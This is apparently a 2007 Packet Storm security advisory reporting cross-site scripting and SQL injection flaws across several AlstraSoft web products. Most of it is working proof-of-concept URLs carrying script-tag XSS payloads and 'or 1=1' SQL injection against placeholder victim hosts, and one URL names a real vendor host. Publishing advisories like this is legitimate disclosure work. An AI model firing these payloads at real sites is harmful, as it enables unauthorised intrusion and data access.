alstrasoft-multi.txt

2007-07-23T00:00:00
ID PACKETSTORM:57940
Type packetstorm
Reporter Lostmon
Modified 2007-07-23T00:00:00

Description

                                        
                                            `####################################################  
AlstraSoft Multiple products multiple Vulnerabilities  
Vendor urL:http://www.alstrasoft.com/products.htm  
Advisore url:http://lostmon.blogspot.com/2007/07/  
alstrasoft-multiple-products-multiple.html  
Vendor notify:yes (webform) Exploit included: yes  
####################################################  
  
  
  
Multiple products of Alstrasoft Are prone vulnerables  
to Cross site scripting and SQL injections style attacks  
  
  
  
################  
examples  
################  
  
For exploit some flaws you need to login  
multiple other variables are afected y all products :S  
  
#####################################  
AlstraSoft Video Share Enterprise  
#####################################  
  
  
http://[Victim]/videoshare/view_video.php?viewkey=  
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+  
sent+"><script>alert()</script>  
  
http://[Victim]/videoshare/view_video.php?viewkey=  
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr  
  
http://[Victim]/videoshare/view_video.php?viewkey=  
9c1d0e3b9ccc3ab651bc"><script>alert()</script>  
  
http://[Victim]/videoshare/signup.php?  
next=upload"><script>alert()</script>  
  
http://[Victim]/videoshare/search_result.php?  
search_id=ghgdgdfd"><script>alert()</script>  
  
http://[Victim]/videoshare/view_video.php?  
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr  
  
http://[Victim]/videoshare/video.php?  
category=tf"><script>alert()</script>&viewtype=  
  
http://[Victim]/videoshare/video.php?  
page=5"><script>alert()</script>  
  
http://[Victim]/videoshare/compose.php?  
receiver=demo"><script>alert()</script>  
  
http://[Victim]/videoshare/groups.php?  
b=ra&catgy=Recently%20Added"><script>alert()</script>  
  
  
http://[Victim]/videoshare/siteadmin/  
channels.php?a=Search&channelid=&channelname=%22  
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search  
  
http://[Victim]/videoshare/siteadmin/muser.php?  
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>  
  
  
path disclosure:  
  
http://[Victim]/videoshare/uprofile.php?  
UID=53"><script>alert()</script>  
  
http://[Victim]/videoshare/channel_detail.php?  
chid=24"><script>alert()</script>  
  
http://[Victim]/videoshare/uvideos.php?UID=53  
"><script>alert()</script>  
  
http://[Victim]/videoshare/view_video.php?  
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'  
  
http://[Victim]/videoshare/groups_home.php?urlkey=  
RSL"><script>alert()</script>  
  
http://[Victim]/videoshare/ufriends.php?UID=253  
"><script>alert()</script>  
  
SQL injection :  
  
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1  
  
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1  
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1  
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1  
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public  
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private  
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1  
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1  
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1  
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1  
  
  
  
###########################################  
AlstraSoft Text Ads Enterprise  
###########################################  
  
http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>  
  
http://[Victim]/ads/search_results.php?query="><script>alert()</script>  
  
http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>  
  
http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>  
  
  
#########################################  
AlstraSoft SMS Text Messaging Enterprise  
########################################  
  
  
http://[Victim]/admin/membersearch.php?pagina=17&q=  
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E  
  
http://[Victim]/admin/edituser.php?userid=  
Walltrapas"><script>alert()</script>  
  
http://[Victim]/admin/membersearch.php?  
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit  
  
  
#################################################  
e-friends  
  
http://alstrahost.com/friends/index.php?mode=  
people_card&p_id=927"><script>alert()</script>  
  
this is a persistent XSS  
  
  
########################################  
AlstraSoft Affiliate Network Pro  
########################################  
  
http://[Victim]/affiliate/merchants/index.php?  
Act=programedit&mode=edit&id=42"><script>alert()</script>  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
programedit&mode=edit&id=42&msg=Program%20Edited%20Success  
fully"><script>alert()</script>  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
daily&d=9&m=07&y=2007 // all variables XSS affected except Act  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date  
"><script>alert()</script>  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007  
&programs=All // all variables XSS affceted except Act y sub  
  
http://[Victim]/affiliate/merchants/temp.php?rowid=  
5"><script>alert()</script> // posible SQL too  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>  
&modofpay=Authorize.net&bankname=&bankno=&  
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=  
  
####################################  
AlstraSoft Article Manager Pro  
####################################  
  
http://[Victim]/article/contact_author.php?  
userid=1%20"><script>alert()</script>  
  
#######################################  
AlstraSoft AskMe Pro  
#######################################  
  
http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL  
  
http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL  
  
http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>  
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL  
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>  
  
###################### €nd ########################  
  
Thnx to estrella to be my ligth.  
Thnx to all Lostmon Team !!!  
  
--  
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
  
--  
La curiosidad es lo que hace mover la mente....  
`